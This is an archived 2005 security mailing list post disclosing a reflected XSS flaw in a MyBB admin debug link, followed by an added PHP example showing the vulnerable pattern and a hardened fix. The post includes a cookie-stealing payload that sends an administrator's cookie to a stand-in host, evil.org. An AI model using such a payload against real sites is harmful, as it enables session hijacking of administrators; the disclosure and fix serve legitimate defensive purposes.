Open Source and information security mailing list archives
 
Message-ID: <0112F88D0204DF4B817F2E089C4ED6B0214BBC@MORLAND.stpaulsschool.org.uk>
Date: Mon Sep  5 15:02:59 2005
From: Dominic.Parikh at stpauls.richmond.sch.uk (Parikh, Dominic)
Subject: XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)

XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am appalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.

At the bottom of every page shown to the admins is a debug link. 
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try: 
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</script>'

Although only admins can exploit this vuln, someone could send them a
link such as 
[forumdisplay.php?fid=2&datecut=
<http://www.forum.com/forumdisplay.php?fid=2&datecut=>
""><script>window.location="http://evil.org/steal.php?cookie="+document.cookie</script>] 
and ouch!

robokoder
fusionnx.com- The Web Developer's Resource Centre
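
The flaw described in the post above, as an added example that is not part of the original message and is not MyBB's own code: a footer debug link that reflects the request's query string, first in the unescaped form and then with validation and output encoding. The function names, the `debug=1` parameter and the treatment of `fid` and `datecut` as integers are assumptions made for illustration.

```php
<?php
// Hypothetical reconstruction of a footer "debug" link that reflects the
// current query string. Names and structure are assumed, not taken from MyBB.

// Vulnerable pattern: request parameters are copied into the href unescaped,
// so a value containing "> closes the attribute and the tag.
function debug_link_unsafe(string $script, array $query): string
{
    $pairs = [];
    foreach ($query as $name => $value) {
        $pairs[] = $name . '=' . $value;   // raw, attacker-controlled
    }
    return '<a href="' . $script . '?' . implode('&', $pairs)
         . '&debug=1">Debug</a>';
}

// Hardened pattern: validate by type, URL-encode the values, then
// HTML-encode the whole URL for the attribute context it is written into.
function debug_link_safe(string $script, array $query): string
{
    $clean = [];
    // Assumption: both parameters are numeric, so anything else becomes 0.
    foreach (['fid', 'datecut'] as $name) {
        if (isset($query[$name]) && is_scalar($query[$name])) {
            $clean[$name] = (int) $query[$name];
        }
    }
    $clean['debug'] = 1;

    // http_build_query() percent-encodes names and values.
    $url = $script . '?' . http_build_query($clean);

    // ENT_QUOTES covers both quote styles inside the attribute.
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8')
         . '">Debug</a>';
}

// Constructed sample input modelled on the request shown in the post.
$query = [
    'fid'     => '2',
    'datecut' => '"><script>alert(document.cookie)</script>',
];

echo debug_link_unsafe('forumdisplay.php', $query), "\n";
echo debug_link_safe('forumdisplay.php', $query), "\n";
```

Setting the session cookie with the `HttpOnly` flag additionally keeps `document.cookie` from exposing it if an encoding step is missed elsewhere.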



